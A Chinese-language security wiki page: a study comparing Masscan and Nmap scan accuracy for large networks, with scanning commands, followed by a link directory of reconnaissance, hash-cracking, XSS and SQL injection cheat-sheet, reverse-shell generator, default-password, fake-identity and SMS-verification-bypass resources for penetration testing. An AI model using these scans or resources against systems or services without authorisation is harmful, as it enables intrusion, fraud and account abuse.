![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRaseUT7Ipkk6oNwak%2F-MWRg3wZHJI7Mf32hl1D%2Fmasscan-test3-4.png?alt=media\&token=0498a9ea-489e-472d-81a3-a94c5f2d4d2b)

**观察：**

> 下面列出的观察结果涵盖了上面提到的所有4个拆分方式的方案。

* 拆分端口范围会扫描出更多的开放端口（这样解决了Masscan在扫描大范围端口时的[问题](https://github.com/robertdavidgraham/masscan/issues/365)）;
* 使用更少的并行任务（本次测试中是2个并行任务）会扫描出更多的开放端口；
* 在所有的拆分方案的测试中，拆分为5个端口范围（拆分方式# 1）的扫描结果最佳。

### **原始数据**

下表显示了使用上述不同Masscan测试用例进行实验的原始数据：

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRaseUT7Ipkk6oNwak%2F-MWRgO_Wo045WkVxB6Qs%2Fmasscan-raw.jpg?alt=media\&token=15864b01-c8d0-4dfd-87ac-acc761e7ecae)

### **Masscan结论：**

根据使用Masscan进行的所有测试用例的结果，得出以下结论：

* 以100％的CPU利用率运行扫描任务，会导致端口开放性降低；
* 使用机器能运行的最大速率容量进行扫描会导致更少的端口开放；
* 当使用并发任务时，较少的任务数会扫描出更多的开放端口；
* 拆分端口范围的方式比拆分目标子网的方式要好；
* 对于端口范围拆分的方式，（拆分方式 #1 和拆分方式 #4）的扫描结果是最佳的。

## **0x08 Nmap的测试用例和测试结果**

在此阶段，只执行版本扫描。Nmap的NSE，OS探测和其他扫描功能都没有涉及。Nmap的线程被限制为T4，等同于如下命令：

```
--max-rtt-timeout=1250ms --min-rtt-timeout=100ms --initial-rtt-timeout=500ms --max-retries=6 --max-scan-delay=10ms
```

以下Nmap选项也用于模拟masscan使用的选项。这些选项应用于所有Nmap测试用例。

使用的Nmap选项如下：

* SYN扫描方式（`-sS`）
* 端口服务版本扫描（`-sV`）
* 线程（`-T4`）
* 随机选择扫描对象（`--randomize-hosts`）
* no ping（`-Pn`）
* no DNS解析（`-n`）

### **测试用例 #1：定期扫描所有的TCP端口**

这个测试用例只是使用Nmap的正常扫描，所以没啥特别之处。使用的命令如下：

```
sudo nmap -sSV -p- -v --open -Pn -n --randomize-hosts -T4 TARGET_SUBNET -oA OUTPUT
```

**观察：**

* 扫描了四天半以后，扫描任务仍然没有完成。这就是前文提到的缺点之一：扫描大型网络目标的时候，Nmap的速度非常慢；
* 由于性能太低，我决定取消这个扫描任务。

### **测试用例 #2：使用X个并发任务扫描所有的TCP端口**

在这种情况下，我尝试通过运行并发的Nmap扫描任务来解决Nmap的低性能问题。通过将目标子网划分为较小的子网块来完成，就像上面Masscan测试的那样。同样，下面的代码（split.py）用于拆分目标子网：

```
#!/usr/bin/python3
import ipaddress, sys

target = sys.argv[1]
prefix = int(sys.argv[2])

for subnet in ipaddress.ip_network(target).subnets(new_prefix=prefix):
    print(subnet)
```

运行命令如下：

```
python3 split.py TARGET_SUBNET 20 | parallel -j JOBS "sudo nmap -sSV -p- -v --open -Pn -n --randomize-hosts -T4 {} -oA {//}"
```

对于这个测试用例，我决定使用两个并发任务实例，如下所示：

**使用5个并发任务：**/16的目标子网拆分为/20的子网

观察：

* 也很慢。扫了2.8天，仍然没扫完，所以我取消了。

**使用64个并发任务：**/16的目标子网拆分为/24的子网

观察：

* 五天过去了，扫描仍然没有完成，所以我也取消了。

### **测试用例 #3: 扫描Masscan识别出的开放端口和主机的组合列表**

这个测试用例背后的想法是，首先获得一个主机列表和一个由Masscan扫描出的开放端口的组合列表。这个开放端口的组合列表被用作基线（如下图图表中的绿色条所示），以确定下面的Nmap测试用例能否能检测出更多或更少的k开放端口。

例如，Masscan检测到300个开放端口，而常规Namp扫描检测到320个开放端口。但是，当使用5个并发Nmap任务扫描时，仅检测到295个开放端口。这意味着常规的Nmap扫描是更好的选择。

要从Masscan的扫描结果中获得主机列表，使用如下命令：

```
grep "Host:" MASSCAN_OUTPUT.gnmap | cut -d " " -f2 | sort -V | uniq > HOSTS
```

下图显示了上述命令的运行情况：

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRggUlOl7zhDr1qix0%2F-MWRhE0HcMvxThkJcemh%2Fnmap-test3-hosts.jpg?alt=media\&token=0a14b391-0789-4463-92d7-8b74da336fe3)

下面的命令用于获取Masscan检测到的所有开放端口的组合列表：

```
grep "Ports:" MASSCAN_OUTPUT.gnmap | cut -d " " -f4 | cut -d "/" -f1 | sort -n | uniq | paste -sd, > OPEN_PORTS
```

下图显示了上述命令的运行情况：

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRggUlOl7zhDr1qix0%2F-MWRhR9NYweU0_-5VQ3B%2Fnmap-test3-ports.jpg?alt=media\&token=60105383-6215-4e05-8233-6345fa282792)

下面的命令用户Nmap的常规扫描：

```
sudo nmap -sSV -p OPEN_PORTS -v --open -Pn -n --randomize-hosts -T4 -iL HOSTS -oA OUTPUT
```

以下命令用于运行并发的Nmap扫描任务。使用上面命令生成的主机列表和开放端口的组合列表。

```
cat HOSTS | parallel -j JOBS "sudo nmap -sSV -p OPEN_PORTS -v --open -Pn -n --randomize-hosts -T4 {} -oA {}"
```

**使用的并发任务数：**

* 0 (这是常规的nmap扫描)
* 10
* 50
* 100

**图表如下：**

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRggUlOl7zhDr1qix0%2F-MWRhamJLu6HsjDvAP7k%2Fnmap-test3.png?alt=media\&token=90ab2dc3-6a38-4f59-b66d-50ddf034b96b)

**观察：**

运行常规的Nmap扫描时，CPU的利用率仅为10%左右；

常规的Nmap扫描发现了更多的开放端口，而并发的Nmap扫描发现的开放端口较少一些。

与基线（上面图表中的绿色条）相比，在某些目标网络（子网A）上识别出更多的开放端口，而在其他的网络目标（子网B和子网C）上检测到的开放端口较少，在某些网络目标（子网D）上没有太大差异。

**Nmap检测到的其他开放端口**

先看下面的表格。例如，让我们假设Masscan在每台主机上检测到以下的开放端口（表格第2列）。在运行Nmap扫描时，Masscan检测到的所有开放端口将用作Nmap的目标端口（表格第3列）。

在我们的示例中，Nmap在完成扫描后检测到的新开放的端口（第4列中的**粗体文字**）。这种情况是怎么发生的？Masscan是一个异步的扫描器，主机192.168.1.2和192.168.1.3上可能丢失了22端口。由于我们合并了每个主机上检测到的开放端口，并将它们作为Nmap的目标端口，因此这个丢失的22端口将再次进行探测。需要注意的是，无法保证Nmap能够将其检测为开放状态，因为还有其他可能影响扫描结果的因素。

| 主机          | Masscan检测到的端口 | Nmap扫描的目标端口         | Nmap运行后检测到的开放端口 |
| ----------- | ------------- | ------------------- | --------------- |
| 192.168.1.1 | 22,80,443     | 22,80,443,8080,8888 | 22,80,443       |
| 192.168.1.2 | 8080,8888     | 22,80,443,8080,8888 | **22**,8080,888 |
| 192.168.1.3 | 80,443        | 22,80,443,8080,8888 | **22**,80,443   |

### **测试用例 #4 扫描由Masscan识别的特定主机上的特定开放端口**

这个与之前的测试用例有点类似。在这个用例中，我没有将Masscan检测到的所有开放端口与每个主机组合在一起。无论Masscan在特定主机上检测到哪些开放端口，Nmap都将使用相同的端口作为目标端口。下表说明了我们这个测试用例中的操作：

| 主机          | Masscan检测到的端口 | Nmap扫描的目标端口 |
| ----------- | ------------- | ----------- |
| 192.168.1.1 | 22,80,443     | 22,80,443   |
| 192.168.1.2 | 8080,8888     | 8080,8888   |
| 192.168.1.3 | 80,443        | 80,443      |

以下命令用于获取主机列表：

```
cat MASSCAN_OUTPUT.gnmap | grep Host | awk '{print $2,$5}' | sed 's@/.*@@' | sort -t' ' -n -k2 | awk -F' ' -v OFS=' ' '{x=$1;$1="";a[x]=a[x]","$0}END{for(x in a) print x,a[x]}' | sed 's/, /,/g' | sed 's/ ,/ /' | sort -V -k1 | cut -d " " -f1 > HOSTS
```

下图显示了上述命令的运行情况：

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRhk0sXHUfRUS3ex4Q%2F-MWRi0bI3wgg193_CaWd%2Fnmap-test4-hosts.jpg?alt=media\&token=3268c819-fec7-40a5-b55c-7875767d06a1)

要从每个主机获取打开的端口列表，执行以下命令：

```
cat MASSCAN_OUTPUT.gnmap | grep Host | awk '{print $2,$5}' | sed 's@/.*@@' | sort -t' ' -n -k2 | awk -F' ' -v OFS=' ' '{x=$1;$1="";a[x]=a[x]","$0}END{for(x in a) print x,a[x]}' | sed 's/, /,/g' | sed 's/ ,/ /' | sort -V -k1 | cut -d " " -f2 > OPEN_PORTS
```

下图显示了上述命令的运行情况：

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRhk0sXHUfRUS3ex4Q%2F-MWRi8VSlfsuvL5pIZ-q%2Fnmap-test4-ports.jpg?alt=media\&token=c882df2b-7166-4883-a943-6c3b9e8a2b57)

可以看到，上图输出的内容于测试用例 #3中的不同，而且使用的命令也不一样。我们查询出每个主机的开放端口列表，而不是所有开放端口的组合。

然后使用parallel命令的`::::`选项将上面两个命令查询出的列表，并发执行Nmap扫描。

> 如果您不熟悉GNU Parallel，请查看本[教程](https://www.gnu.org/software/parallel/parallel_tutorial.html)。

```
parallel -j JOBS --link "sudo nmap -sSV -p {2} -v --open -Pn -n -T4 {1} -oA {1}" :::: HOSTS :::: OPEN_PORTS
```

这是个例子，当执行上述parallel命令后，并扫描时会发生什么（多条命令同时执行）。

```
sudo nmap -sSV -p 443 -v --open -Pn -n -T4 192.168.1.2 -oA 192.168.1.2
sudo nmap -sSV -p 80,443,1935,9443 -v --open -Pn -n -T4 192.168.1.5 -oA 192.168.1.5
sudo nmap -sSV -p 80 -v --open -Pn -n -T4 192.168.1.6 -oA 192.168.1.6
sudo nmap -sSV -p 80,443 -v --open -Pn -n -T4 192.168.1.7 -oA 192.168.1.7
sudo nmap -sSV -p 08,443 -v --open -Pn -n -T4 192.168.1.9 -oA 192.168.1.9
```

下图展示了测试用例执行时，发生的一个片段。如下图所示，使用parallel运行10个并发的Nmap扫描。

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRhk0sXHUfRUS3ex4Q%2F-MWRiTi_7fl12mgSWHPh%2Fnmap-test4-1.jpg?alt=media\&token=fc4027cc-5930-4e3a-8189-537abb568803)

**使用的并发任务数：**

* 10
* 50
* 100

**图表如下：**

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRhk0sXHUfRUS3ex4Q%2F-MWRi_Nviu0r3lW_Wf_Q%2Fnmap-test4-2.png?alt=media\&token=0b78c2a4-aa3a-43c8-8720-9c7dab32688b)

**观察：**

* 更多的并发任务和以100%的CPU利用率进行扫描时，检测出更少的开放端口。
* 10个和50个Nmap并发任务，扫描结果差别不大，因此建议可以运行50个并发任务，以减少扫描时间。
* 此测试用例比测试用例 #3的扫描速度略快，但是检测出的开放端口较少。

### **原始数据**

下表显示了使用上述不同的Nmap测试用例进行实验的原始数据：

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MWRhk0sXHUfRUS3ex4Q%2F-MWRikoYDxhx8y1Pr4dd%2Fnmap-raw.jpg?alt=media\&token=10599beb-c311-481a-990b-5743f45ad716)

### **Nmap结论：**

根据使用Nmap进行的实验结果，得出以下结论：

* 测试用例 #3（扫描Masscan识别出的开放端口和主机的组合列表）可获得最佳的结果。这也是推荐的方法，因为可以发现额外的端口开放；
* 以100%的CPU利用率进行扫描，会导致检测出更少的开放端口；
* 使用并发任务时，更少的任务数会导致检测出更多的开放端口；

## **0x09 研究结论**

### **推荐的扫描方法**

根据对Masscan和Nmap进行的多个测试用例的测试结果，建议采用以下方法在端口扫描期间实现速度和精度之间的平衡：

1. 首先运行2或3个并发的Masscan任务，所有的65535个端口分为4-5个更小的范围；
2. 获取主机列表以及Masscan扫描出的开放端口的组合列表；
3. 使用这些列表作为Nmap的扫描目标并执行常规Nmap扫描。

### **注意事项**

对于这两种扫描端口的工具，应采用以下的预防措施进行规避，因为它们会导致检测到的开放端口更少：

* 扫描时避免CPU过载。
* 不要使用扫描机器的最大速率容量。
* 避免运行太多并行任务。

## **0x10 最后的想法**

虽然这项研究提供了一种如何在互联网端口扫描期间平衡速度和准确性的方法，但读者不应将此结论视为100％可靠。由于时间和预算有限，研究期间没有涵盖其他的影响因素。最值得注意的是，在整个研究期间仅使用一个IP地址进行扫描并不是一个好的设置。因为在我多次扫描相同的目标网络后，机器的IP地址可能会以某种方式被拉黑，这可能导致检测到的开放端口数量不太一致。

请重新查看**0x06 范围和限制**部分，因为从中可以很好的理解影响本研究结果的一些因素。


# 在线信息收集汇总

来源自https\://gitbook.se7ensec.cn/

## 信息收集

### 综合信息

[微步在线威胁情报社区](https://x.threatbook.cn/)

[VirusTotal](https://www.virustotal.com/gui/home/url)

[RiskIQ Community Edition](https://community.riskiq.com/home)

### 搜索引擎

[Google搜索](https://www.google.com/)

[Bing搜索](https://www.bing.com/)

[Baidu搜索](https://www.baidu.com/)

[Shodan网络空间搜索引擎](https://www.shodan.io/)

[FOFA Pro - 网络空间安全搜索引擎，网络空间搜索引擎，网络空间测绘，安全态势感知](https://fofa.so/)

[ZoomEye - 网络空间搜索引擎](https://www.zoomeye.org/)

[Google Hacking Database](https://www.exploit-db.com/google-hacking-database)

[进阶Google搜索](https://w-e-b.site/?act=google-search)

[Google Hacking](https://www.0xll.cc/google_hack.html) （快捷/github/pastbin）

### 子域/IP/旁站C段

#### 子域发现

**基于DNS**

[The World's Largest Repository of Historical DNS data](https://securitytrails.com/)（综合型-推荐）

[DNSdumpster.com](https://dnsdumpster.com/) （推荐）

[searchdns.netcraft.com](https://searchdns.netcraft.com/)（推荐）

[搜索网站的所有子域](https://suip.biz/?act=amass)

[即时搜索任何站点的子域](https://w-e-b.site/?act=findomain)（接口多速度快）

[在线调查工具 - 反向IP，NS，MX，WHOIS和搜索工具](https://dnslytics.com/)（综合型）

[DNSdumpster.com](https://dnsdumpster.com/)

[DNSDB-历史DNS查询](https://dnsdb.io/zh-cn/)

[IP History - ViewDNS.info](https://viewdns.info/iphistory/?domain=www.baidu.com)

**基于证书**

[crt.sh - 证书搜索](https://crt.sh/)

[网络上的 HTTPS 加密 – Google 透明度报告](https://transparencyreport.google.com/https/certificates)

[Censys.io](https://censys.io/certificates)（综合型）

**基于爆破**

[在线子域名爆破-Domain fuzz](https://phpinfo.me/domain/)

[在线子域名爆破-子成君提供](http://z.zcjun.com/)

#### IP-/-探测

[域名查ip、ip反查域名](http://site.ip138.com/)

[nslookup查询](http://tool.chinaz.com/nslookup/)

[多个地点Ping服务器,网站测速 - 站长工具](http://ping.chinaz.com/)

[同IP网站查询，同服务器网站查询 - 站长工具](http://stool.chinaz.com/same)

[Reverse IP Lookup - Find All Hosts Sharing An IP Address](https://www.ipaddress.com/reverse-ip-lookup)

[Ping查询*专业的 IP 地址库*IPIP.NET](https://tools.ipip.net/ping.php)

[网站IP地址查询*批量查询网站IP地址*买链帮手,网站批量查询工具](http://www.link114.cn/ip/)（支持批量ip查询）

[发现隐藏在CloudFlare背后的坏人](http://www.crimeflare.org:82/cfs.html)（CloudFlare老外ip数据库）

#### 旁站C段

[在线旁站查询-C段查询-必应接口C段查询-同ip网站查询 Lcy's Blog](https://phpinfo.me/bing.php)

[Chinaz-同IP网站查询，同服务器网站查询](http://s.tool.chinaz.com/same)

<https://bgp.he.net/>

可用子域发现->DNS->综合型

### 邮箱采集

[红队测试之邮箱打点](https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==\&mid=2247483886\&idx=1\&sn=4c98836e278737054a2d32416007fa27\&chksm=9b39275fac4eae490e0c5ca5f90887aa3b8a441f137d18d3b73470ba46577b41ea3a9cfa1342\&mpshare=1\&scene=23\&srcid=\&sharer_sharetime=1589279316797\&sharer_shareid=596f231001c1b1188da61ae064765cc8#rd)（文章）

[搜邮箱- 搜邮箱](https://souyouxiang.com/)（推荐）

[微匹-邮箱](http://veryvp.com/Emailgo/index)

[Find email addresses in seconds • Hunter (Email Hunter)](https://hunter.io/)

[Find email addresses of companies and people - Skymem](http://www.skymem.info/)

[Search for domains | Email Format](https://www.email-format.com/i/search/)

<https://github.com/bit4woo/teemo>（含邮箱采集）

[Free SPF/DKIM/DMARC analyzer tools](https://dmarcly.com/tools/)（SPF/DKMI/DMARC验证）

[SPF Query Tool](https://www.kitterman.com/spf/validate.html)（SPF验证）

[邮件伪造之SPF绕过的5种思路](https://www.t00ls.net/viewthread.php?tid=56426\&highlight=%E9%82%AE%E4%BB%B6%E4%BC%AA%E9%80%A0)

### 指纹识别

[云悉WEB资产梳理-在线CMS指纹识别平台 - 云悉安全](http://www.yunsee.cn/)（综合型-推荐）

[在线指纹识别,在线cms识别小插件--BugScaner](http://whatweb.bugscaner.com/look/)

[ThreatScan - 免费的网站在线安全检测平台-TScan](https://scan.top15.cn/web/)

### 端口扫描

[nmap在线扫描-芳华绝代安全团队](http://www.scanip.cn/index/index.do)（可自定义）

[在线端口扫描仪由Nmap提供支持- HackerTarget.com](https://hackertarget.com/nmap-online-port-scanner/)

[在线Nmap扫描仪-nmap.online](https://nmap.online/)

[Nmap提供免费和在线开放端口以及正在运行的服务扫描程序](https://w-e-b.site/?act=nmap)

[带有选项的GUI Nmap在线扫描仪](https://w-e-b.site/?act=nmap-online)（可自定义）

[IPv6 addresses Port scaning (nmap for IPv6)](https://w-e-b.site/?act=nmap-ipv6)（IPv6）

[NMAP SCRIPT HELP -VER007](https://www.lshack.cn/nmap-script/nmap-script-help.html)（nmap脚本手册）

### whois查询

[爱特高级WHOIS查询系统](https://whois.aite.xyz/)（可以查看明文信息）

[WHOIS Search, Domain Name, Website, and IP Tools - Who.is](https://who.is/)

[BackyardRevolution.org WHOIS，DNS和域信息-DomainTools](http://whois.domaintools.com/)

[国家域名 Whois - 中国互联网络信息中心](https://whois.cnnic.cn/WelcomeServlet)

[IP Whois - 中国互联网络信息中心](http://ipwhois.cnnic.net.cn/)

### 域名工具

#### 单一域名

[站长工具-百度权重排名查询-站长seo查询 - 爱站网](https://www.aizhan.com/)

[Chinaz-网站Alexa排名](https://alexa.chinaz.com/default.html)

[SEO综合查询 - 站长工具](http://seo.chinaz.com/)

#### 批量域名

[alexa排名批量查询](http://162.net.cn/site-alexa/)

[买链帮手\_最好用的网站批量查询工具](http://www.link114.cn/)（批量反查ip）

[批量查询网站标题](http://zhanzhang.soshoulu.com/zhanzhang/webtitle.aspx)

[域名批量查询](https://www.xz.com/domainTool/batchSearch)（综合型）

#### 域名处理

[从网址Url中提取主域名*网址根域名一键提取,去重*在线域名整理工具\_桔子SEO工具](https://seo.juziseo.com/tools/domain/)

## 信息伪造

### 匿名个人身份信息生成器

[Generate a Random Name - Fake Name Generator](https://www.fakenamegenerator.com/)

[世界各国虚拟身份信息、地址、信用卡生成](http://www.haoweichi.com/)

[世界各国身份信息、地址、信用卡生成器](http://shenfendaquan.com/)

虚拟银行卡号

### 完全匿名注册的电子邮箱

ProtonMail: [Secure email: ProtonMail is free encrypted email](https://protonmail.com/)

mail.com: [Free email accounts - Register today at mail.com](https://www.mail.com/)

### 临时、一次性、匿名邮箱

[查错网 - 24Mail、临时邮箱、十分钟邮箱（10分钟)、临时邮、临时Email](http://24mail.chacuo.net/)

[YOPmail - 临时、匿名的免费邮箱地址](http://www.yopmail.com/)

[10分钟邮箱](https://10minutemail.net/) - [10minutemail.net](https://10minutemail.net/)、[10minutemail.org](https://10minutemail.org/)、[10minutemail.info](https://10minutemail.info/)

[临时邮箱 - 十秒钟内收到邮件](https://www.linshiyouxiang.net/)

[Guerrilla Mail - Disposable Temporary E-Mail Address](https://www.guerrillamail.com/)

[Moakt Email - 临时邮箱专业服务](https://www.moakt.com/)

[Temp Mail - Disposable Temporary Email](https://temp-mail.org/)

[Fake Mail Generator - Free temporary email addresses](http://www.fakemailgenerator.com/)

[临时邮箱,10分钟邮箱,24小时邮箱 - LinShiYou.Com](https://linshiyou.com/)

[Nada - temp mail](https://getnada.com/#)

[TempMail，免费临时邮件地址](https://tempmail.net/)

### 国内外手机号、短信验证码平台

[掠影网络 - 免费在线接收短信验证码](https://zusms.com/)（香港/美国/加拿大/中国，[~~之前的旧地址~~](https://sms.cngrok.com/receiving-sms/)）

[becmd.com - 免费短信验证码接收平台](https://www.becmd.com/)（美国/中国）

[materialtools.com - 云短信 在线短信接收](https://www.materialtools.com/)（号码多、号段好，中国/英国，[~~旧地址~~](https://www.pdflibr.com/)）

[yunduanxin.net - 云短信 免费在线接收短信验证码](https://yunduanxin.net/)（号段好，美国/加拿大/英国/中国）

[Receive SMS Online For Free - Free](http://hs3x.com/)（美国,英国,奥地利,瑞典,比利时）

[Receive FREE SMS online](http://receivefreesms.com/)（美国,法国,俄罗斯,澳大利亚,英国,加拿大,瑞士等各国）

[Receive-SMS-Now - 美国,加拿大,西班牙](https://receivefreesms.net/)

[Receive Online SMS - 美国,瑞典,挪威,西班牙,英国](http://receiveonlinesms.biz/)

[Receive SMS Online - 国外免费临时手机号](http://receiveonlinesms.com/)

[Receive SMS Online - 俄国,英国,乌克兰](http://receive-sms-online.com/)

[Receive SMS Online - 美国,加拿大,西班牙](http://receivesmsonline.in/)

[Receive SMS - 比利时,英国,美国](http://receivesmsverification.com/)

[SELLAITE - 爱沙尼亚](http://sms.sellaite.com/)

[Receive Free SMS - 美国,英国,法国,波兰,比利时,加拿大](http://www.freesmsverifications.com/)

[Receive-SMS-Now - 美国,加拿大,荷兰](http://www.receive-sms-now.com/)

[免费接码-短信验证码-在线接收短信-接码平台 - 中国,缅甸,美国](http://www.shejiinn.com/)

[Z-SMS - 中国,美国,缅甸,爱沙尼亚](http://z-sms.com/)

[FreePhonenum - 国外免费临时手机号（中文）美国,加拿大](https://ch.freephonenum.com/)（**支持免费发短信**）

[Receive a SMS Online](https://receiveasms.com/)（美国,英国,法国,加拿大等全球各国，[~~旧地址~~](https://receive-a-sms.com/)）

[Receive-SMS - 美国](https://receive-sms.com/)

[Free SMS Numbers Online - 美国,英国,加拿大,波兰](https://smsnumbersonline.com/)

[Receive SMS online for Free](https://sms-online.co/receive-free-sms/)（美国,英国,加拿大,瑞典,法国,马来西亚,印度尼西亚）

[SMS-Receive - 俄罗斯,法国,罗马尼亚,西班牙,荷兰,英国](https://sms-receive.net/)

[SMSReceiveFree - 美国,英国,加拿大](https://smsreceivefree.com/)

[Free Online Phone - 美国,加拿大,英国,瑞典](https://www.freeonlinephone.org/)

[Textfree - Free Texting and Calling](https://textfree.us/)（安卓 和 iOS App，[~~旧地址~~](https://www.pinger.com/text-free/)）

[Receive SMS Online](https://www.receivesms.co/)（美国,英国,法国,加拿大等全球各国）

[Receive SMS Online - 国外免费临时手机号](https://www.receivesms.net/)

[Receive SMS Online for FREE](https://www.receive-sms-online.info/)（英国,罗马尼亚,美国,西班牙,法国,德国,俄罗斯）

[RECEIVE SMS ONLINE - 美国,加拿大,英国](https://www.receivesmsonline.net/)

[TextNow - 美国](https://www.textnow.com/)

[Twilio - 用于SMS，语音，视频和身份验证的通信API](https://www.twilio.com/)（**支持API调用**，看上去很不错）

[MyTrashmobile - 美国,英国,加拿大](https://zh.mytrashmobile.com/)

## 在线工具

### 编码解码

[php编码转换工具 - Base64+Gzinflate在线压缩 - 站长工具 - 追溯](http://www.zhuisu.net/tool/phpencode.php)

[Ascii转中文字符-中文转Ascii编码-在线Ascii编码解码工具](http://www.jsons.cn/ascii/)

[XSS'OR - Hack with JavaScript](http://xssor.io/)

\[[代码审计\] 知识星球小工具](https://zsxq.tricking.io/tool/)（全）

[HTML特殊字符编码对照表](https://www.jb51.net/onlineread/htmlchar.htm)

[javascript编码自动化](http://0xcc.net/jsescape/)

[Xss测试字符串转换工具-工具猫](https://www.toolmao.com/xsstranser)（String.fromCharCode()）

[Unicode - Compart](https://www.compart.com/en/unicode/) （bypass waf [参考](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html)）

[PlayGround](https://tool.leavesongs.com/)（全）

### 加密解密

#### 哈希识别

[哈希类型识别](https://w-e-b.site/?act=hashtag)

#### 哈希破解

[NTLM密码加密计算器](https://www.jisuan.mobi/p11BbzHum6b3uyJW.html)（明文转hash）

[Get Cracking | crack.sh](https://crack.sh/get-cracking/)

[ObjectifSécurité - Ophcrack](https://www.objectif-securite.ch/en/ophcrack.php)

[md5在线解密破解,md5解密加密](https://www.cmd5.com/)

[MD5在线解密-md5在线破解-批量破解md5网站 - ChaMd5.Org](http://www.chamd5.org/)

[SOMD5](https://www.somd5.com/)

[md5 cracker - The fastest way to recover your lost passwords - Crack it](http://md5this.com/)

### SQL注入

[带有sqlmap的免费和在线SQL注入扫描程序](https://w-e-b.site/?act=sqlmap)

[SQL注入知识库](https://websec.ca/kb/sql_injection)

[NetSPI SQL注入Wiki](https://sqlwiki.netspi.com/)

[SQL injection cheat sheet | Web Security Academy](https://portswigger.net/web-security/sql-injection/cheat-sheet)

### XSS备忘

[HTML5 Security Cheatsheet](https://html5sec.org/)

[Cross-site scripting (XSS) cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)

[XSS有效负载](http://www.xss-payloads.com/)（综合型）

[Tiny XSS Payloads](https://terjanq.github.io/Tiny-XSS-Payloads/index.html) （极短）

[XSS\_Cheat\_Sheet\_2020\_Edition](https://github.com/heroanswer/XSS_Cheat_Sheet_2020_Edition)（github）

### 反弹SHELL

[Reverse shell cheatsheet](https://ir0ny.top/pentest/reverse-encoder-shell.html)（快速生成）

[一句话反弹SHELL命令生成器](https://ares-x.com/tools/reverse-shell/)

[Reverse Shell as a Service](https://github.com/lukechilds/reverse-shell)（自动化反弹脚本）

[RUNTIME.EXEC有效负载生成器](https://ares-x.com/tools/runtime-exec/)

### 密码组合

#### 密码策略

[搜密码 - web中间件/web应用/IOT设备/视频设备/路由器等默认密码查询](http://www.sopwd.com/) - 搜密码 sopwd.com

[Default Passwords - CIRT.net](https://cirt.net/passwords) - 提供528个供应商，2102个密码的默认密码查询

[Default Router Login, Passwords and IP Addresses](https://www.cleancss.com/router-default/) - 只需选择设备品牌，就可以查找

[HUAWEI 默认账号/密码查询工具](https://support.huawei.com/onlinetoolweb/pqt/index.jsp) **-** HUAWEI企业网络产品，可根据产品/版本或关键字快速检索信息

[路由器密码社区数据库](http://www.routerpasswords.com/) - 查找路由器的默认密码，输入厂商就可以找到默认密码列表

[默认路由器密码列表](https://portforward.com/router-password/) - Internet上最全面的默认路由器密码列表

[默认路由器用户名和密码](https://bestvpn.org/default-router-passwords/) - 路由器用户名，密码和IP的综合列表。提供了2354个默认用户密码查询

[工具锚路由器默认密码查询](https://toolmao.com/baiduapp/routerpwd/) - 支持国内主流的路由器品牌，提供在线查询功能

[默认密码列表](https://datarecovery.com/rd/default-passwords/) - 提供了一个默认密码列表，不定期更新，可通过网页CTRL+F搜索

#### 密码生成

[生成随机密码 - 密码生成器](https://suijimimashengcheng.51240.com/)

[密码生成器-LastPass](https://www.lastpass.com/zh/password-generator)

### 数据处理

#### 邮件分析

[邮件原文分析](https://w-e-b.site/?act=email)

#### 文件分析

[从可执行文件中提取所有字符串](https://w-e-b.site/?act=rabin2)

[显示有关可执行文件的信息](https://w-e-b.site/?act=rabin2i)

#### 杂七杂八

[Burp Post、Get数据包转为上传multipart/form-data格式数据包工具 - 数据包格式在线转换](http://ld8.me/multipart.php)

[在线二维码解码器 二维码安全检测工具](http://jiema.wwei.cn/)

[PDF 转换为 PPT 和 PPTX 文件](https://www.ilovepdf.com/zh_cn/pdf_to_powerpoint)

[cookie字符串转json(dict字典)](http://tools.bugscaner.com/cookietodict)

[字数统计*在线字数计算器*英文汉字字数统计*兼容手机版*一站阅读](https://www.a-site.cn/tool/zi/)

[草料二维码生成器](https://cli.im/)

[iHateRegex - 正则表达式](https://ihateregex.io/)

### 点击劫持

[Quickjack - samy kamkar](http://samy.pl/quickjack/quickjack.html)

### 点击分析

[实时Web分析| Clicky](https://clicky.com/)

### 提权辅助

[极光无限-安全扫描仪](https://detect.secwx.com/)（通用）

[提权辅助网页](https://bugs.hacking8.com/tiquan/)（Win）

[Windows Privilege Escalation Exploit Search](http://blog.neargle.com/win-powerup-exp-index/)（Win）

[Find Missing Patches](https://patchchecker.com/)（Win）

[enumy](https://github.com/luke-goddard/enumy)（Linux）

### 沙盒分析

[Interactive Online Malware Analysis Sandbox - ANY.RUN](https://app.any.run/)

<https://sandbox.ti.qianxin.com/sandbox/page>

### APP安全

[Android Security Wiki](http://www.droidsec.cn/android-security-basic/)

### 社会工程

#### 注册查询

[你注册过哪些网站？一搜便知 - REG007](https://www.reg007.com/)

#### 链接定位

[诚殷网络-来源管理用户中心](https://re.chinacycc.com/index.php?type=login)

[遇见数据仓库-遇见工具-定位资源-在线数据仓库-福利资源-met.red](https://met.red/)

#### IP-/-定位

[RTBAsia ODX - Open Data Exchange](https://ip.rtbasia.com/)（精度高）

#### 密码生成

[社工密码字典在线生成](https://www.xiaobaibk.com/guess/)

[社工密码字典在线生成](https://xsshs.cn/xss.php?do=pass)

## 文章聚合

